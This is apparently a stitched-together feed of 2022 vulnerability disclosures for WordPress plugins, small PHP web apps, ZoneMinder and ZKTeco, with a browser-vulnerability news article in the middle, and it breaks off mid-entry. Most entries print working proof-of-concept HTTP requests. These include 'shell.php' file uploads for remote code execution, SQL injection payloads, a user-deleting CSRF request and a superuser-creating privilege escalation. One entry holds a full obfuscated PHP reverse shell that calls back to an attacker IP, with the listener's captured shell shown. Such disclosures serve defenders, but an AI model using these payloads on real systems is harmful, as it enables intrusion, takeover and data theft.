Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder plugin <= 3.6.0 at WordPress allows uploading the JSON file and updating the options. Requires Import and Export add-on.

CVE-2021-36915: Profile Builder – User Profile & User Registration Forms

Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan's Asset CleanUp: Page Speed Booster plugin <= 1.3.8.4 at WordPress.

CVE-2021-36899: Asset CleanUp: Page Speed Booster

Wedding Planner v1.0 is vulnerable to arbitrary code execution via users_profile.php.

Permalink

**Wedding Planner v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author：李趴菜

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability url: http://ip/Wedding-Management-PHP/admin/blog\_events\_edit.php?id=31

Loophole location：The editing function of "Liam moore" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "users\_profile.php" file.

Click "Edit My Account" to save

Request package for file upload：

POST /Wedding\-Management\-PHP/admin/users\_profile.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management-PHP/admin/users\_profile.php
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11146289715390
Content-Length: 1065
\-----------------------------11146289715390
Content-Disposition: form-data; name="profile\_picture"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------11146289715390
Content-Disposition: form-data; name="firstname"
Liam
\-----------------------------11146289715390
Content-Disposition: form-data; name="lastname"
Moore
\-----------------------------11146289715390
Content-Disposition: form-data; name="email"
admin@mail.com
\-----------------------------11146289715390
Content-Disposition: form-data; name="username"
adminliam
\-----------------------------11146289715390
Content-Disposition: form-data; name="gender"
m
\-----------------------------11146289715390
Content-Disposition: form-data; name="address"
Grand Meadows
\-----------------------------11146289715390
Content-Disposition: form-data; name="designation"
0
\-----------------------------11146289715390
Content-Disposition: form-data; name="submit"
\-----------------------------11146289715390--

The files will be uploaded to this directory \\Wedding-Management-PHP\\admin\\upload\\users 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42034: bug_report/RCE-1.md at main · debug601/bug_report

Wedding Planner v1.0 is vulnerable to Arbitrary code execution via package_edit.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author: Tr0e

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability url: http://ip/Wedding-Management-PHP/admin/package\_edit.php?id=1

Loophole location：The editing function of "Services" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "package\_edit.php" file.

Click "Edit" to save

Request package for file upload：

POST /Wedding\-Management\-PHP/admin/package\_edit.php?id\=1 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management-PHP/admin/package\_edit.php?id=1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------2779055672062
Content-Length: 529
\-----------------------------2779055672062
Content-Disposition: form-data; name="wedding\_type"
2
\-----------------------------2779055672062
Content-Disposition: form-data; name="price"
0.00
\-----------------------------2779055672062
Content-Disposition: form-data; name="preview\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------2779055672062
Content-Disposition: form-data; name="submit"
\-----------------------------2779055672062--

The files will be uploaded to this directory \\Wedding-Management-PHP\\admin\\upload\\categories

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42229: bug_report/RCE-1.md at main · Tr0ee/bug_report

Web Based Student Clearance version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Web Based Student Clearance 1.0 - Unrestricted File Upload 
leads to Remote Code Execution (Authenticated) 
# Date: 08-10-2022 
# Exploit Author: Akash Pandey ( L3V1ATH0N ) 
# Vendor Homepage: 
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html 
# Software Link: 
https://www.sourcecodester.com/download-code?nid=15627&title=Web-Based+Student+Clearance+System+in+PHP+Free+Source+Code 
# Version: v1.0 
# Tested on: Windows, XAMPP, Kali Linux 
# CVE :

----- POC -----

Note : The reverse shell below is for Windows based PHP reverse shell. 
If the target host is using Linux then the Linux based PHP reverse shell 
must be used.

---------------

Request : URL - 
http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
=========

POST 
/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
HTTP/1.1 
Host: 192.168.1.12 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 
Firefox/91.0 
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: multipart/form-data; 
boundary=---------------------------71268058833541201443517047173 
Content-Length: 6864 
Origin: http://192.168.1.12 
Connection: close 
Referer: 
http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm 
Upgrade-Insecure-Requests: 1

-----------------------------71268058833541201443517047173

Content-Disposition: form-data; name="userImage"; filename="shell.php" 
Content-Type: application/x-php

<?php

header('Content-type: text/plain'); 
$ip = "192.168.1.26"; //change this 
$port = "80"; //change this 
$payload = 
"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"; 
$evalCode = gzinflate(base64_decode($payload)); 
$evalArguments = " ".$port." ".$ip; 
$tmpdir ="C:\\windows\\temp"; 
chdir($tmpdir); 
$res .= "Using dir : ".$tmpdir; 
$filename = "D3fa1t_shell.exe"; 
$file = fopen($filename, 'wb'); 
fwrite($file, $evalCode); 
fclose($file); 
$path = $filename; 
$cmd = $path.$evalArguments; 
$res .= "\n\nExecuting : ".$cmd."\n"; 
echo $res; 
$output = system($cmd);

?>

-----------------------------71268058833541201443517047173

Content-Disposition: form-data; name="btnedit"

-----------------------------71268058833541201443517047173--

========================================= 
End of Request 
=========================================

Response: 
========

HTTP/1.1 302 Found 
Date: Sat, 08 Oct 2022 09:30:51 GMT 
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 
X-Powered-By: PHP/7.4.30 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate 
Pragma: no-cache 
Location: edit-photo.php 
Connection: close 
Content-Type: text/html; charset=UTF-8 
Content-Length: 8575

======================================== 
End of Response 
========================================

The Reverse Shell is located at below URL 
-----------------------------------------

Request: URL - 
http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php 
========

GET 
/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php 
HTTP/1.1 
Host: 192.168.1.12 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 
Firefox/91.0 
Accept: image/webp,*/* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Referer: 
http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm

======================================== 
End of Request 
========================================

Response: 
=========

HTTP/1.1 200 OK 
Date: Sat, 08 Oct 2022 09:32:16 GMT 
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 
X-Powered-By: PHP/7.4.30 
Content-Length: 268 
Connection: close 
Content-Type: text/plain;charset=UTF-8

 
Notice: Undefined variable: res in 
C:\xampp\htdocs\student_clearance_system_Aurthur_Javis\student_clearance_system_Aurthur_Javis\uploads\shell.php 
on line 12 
Using dir : C:\windows\temp

Executing : D3fa1t_shell.exe 80 192.168.1.26

======================================== 
End of Response 
========================================

After uploading the reverse shell file you will get the reverse shell 
normally. If you don't get reverse shell then locate to 'uploads' folder.

Reverse Shell Remotely: 
======================

┌──(kali㉿kali)-[~] 
└─$ rlwrap nc -lvnp 80 
listening on [any] 80 ... 
connect to [192.168.1.26] from (UNKNOWN) [192.168.1.12] 65168 
b374k shell : connected

Microsoft Windows [Version 10.0.19043.2006] 
(c) Microsoft Corporation. All rights reserved.

whoami 
whoami 
l3v1ath0n\admin

C:\Windows\Temp>

Web Based Student Clearance 1.0 Shell Upload

By Waqas
According to researchers, Google Chrome, Mozilla Firefox, and Microsoft Edge browser contained the most vulnerabilities in 2022.
This is a post from HackRead.com Read the original post: Apple Safari Safest, Google Chrome Riskiest Browser of 2022- Study

A new report from VPN service provider Atlas VPN has revealed startling details about how safe and secure some of the most popular internet browsers are. Google Chrome has been declared the most vulnerable browser of 2022, whereas Apple Safari is the safest.

Here are more details from the report. The report’s findings are based on the VulDB vulnerability database, covering the period from January 1st, 2022 to October 5th, 2022.

**Google Chrome Most Vulnerable Browser**

Google Chrome is regarded as one of the most reliable browsers, and that’s why most users prefer it as their default web browser. In fact, Chrome’s market cap was around 61.96% in August 2022, reported SimilarWeb.

Therefore, it is surprising to know that the world’s most popular browser is also the riskiest. According to Atlas VPN’s report, Chrome contains 303 vulnerabilities and leads the charts with 3,159 cumulative vulnerabilities.

1.  Minecraft declared the most malware-infected game
2.  US and China Exposed Most Cloud Databases in 2021
3.  VirusTotal Reveals Apps Most Exploited to Spread Malware
4.  Google, Microsoft and Oracle generated most vulnerabilities
5.  Revealed: The 200 Most used and Worst Passwords of 2021
6.  Microsoft Office Most Exploited Software in Malware Attacks
7.  Top 10 Android Educational Apps That Collect Most User Data

**Vulnerability Details**

Chrome is the only browser in which new vulnerabilities have been discovered in October 2022 so far. These include the following vulnerabilities:

*   CVE-2022-3307
*   CVE-2022-3318
*   CVE-2022-3314
*   CVE-2022-3311
*   CVE-2022-3309

Chrome users can fix these issues by updating the browser with version 106.0.5249.61. After Google Chrome, the next most vulnerable browser is Mozilla Firefox, which contains 117 vulnerabilities.

According to Atlas VPN’s blog post, Microsoft Edge was the third most vulnerable web browser, with around 103 vulnerabilities, marking a 61% increase compared to the vulnerabilities discovered in October 2021.

**Is Safari Browser the Safest of All?**

Although Apple Safari wasn’t rated the riskiest browser of 2022, it doesn’t mean it is the cleanest and most securest of all. Safari browser had 26 vulnerabilities discovered in the first three-quarters of 2022, and 1,139 vulnerabilities have been discovered since the browser’s release. However, it was declared the safest because of the comparatively low vulnerability count in 2022.

Interestingly, there weren’t any documented vulnerabilities in the Opera browser this year, and so far, there have been just 344 vulnerabilities affecting it. But, since Opera shares the Chromium browser engine, Chromium vulnerabilities may impact it.

Nevertheless, web browser users should continually update the latest version to remain safe and always download extensions and plug-ins from credible, official sources.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Apple Safari Safest, Google Chrome Riskiest Browser of 2022- Study

ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.

Authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request.

**Impact**

An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application.

**Example Request**

    GET /zm/index.php?view=options&tab=users&action=delete&markUids%5B%5D=13&deleteBtn=Delete HTTP/1.1
    Host: 10.0.10.107
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Origin: http://10.0.10.107
    Connection: close
    Referer: http://10.0.10.107/zm/index.php?view=options&tab=users
    Cookie: zmSkin=classic; zmCSS=base; zmLogsTable.bs.table.sortOrder=desc; zmLogsTable.bs.table.sortName=Message; zmLogsTable.bs.table.pageNumber=1; ZMSESSID=24u3uv4ed55n04f73slbu95pm9
    Upgrade-Insecure-Requests: 1
    

**Patches**

\[c0a4c05\]

**Workarounds**

None, please upgrade

**References**

https://www.trenchesofit.com/2022/09/30/3260/

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in https://github.com/ZoneMinder/zoneminder
*   Email us at info@zoneminder.com

CVE-2022-39290: CSRF Key Bypass Using HTTP Methods

An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.

**Full Disclosure mailing list archives**

_From_: Caio B <caioburgardt () gmail com> 
_Date_: Thu, 29 Sep 2022 11:20:39 -0300 

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0\_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base\_index.action

Cookie: <INSERT\_LOW-PRIVILEGE\_COOKIE\_HERE>

Upgrade-Insecure-Requests: 1





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"





test\_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"





add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"





1657813612925\_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"





base

-----------------------------291763244192371568695079347--





#######################END#######################
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

* **ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)** _Caio B (Sep 30)_

CVE-2022-36634: ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)

Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=maintenance/manage_category.

Permalink

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: hegeoo

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=maintenance/manage\_category&id=

Vulnerability location: /pet\_shop/admin/?page=maintenance/manage\_category&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=maintenance/manage\_category&id=4%27%20and%20length(database())%20=11--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=maintenance/manage\_category&id\=4%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close

length=11 

length=12

CVE-2022-41377: bug_report/SQLi-2.md at main · hegeoo/bug_report

Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=inventory/manage_inventory.

Permalink

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: hegeoo

Login account: admin/admin123 (Super Admin account)

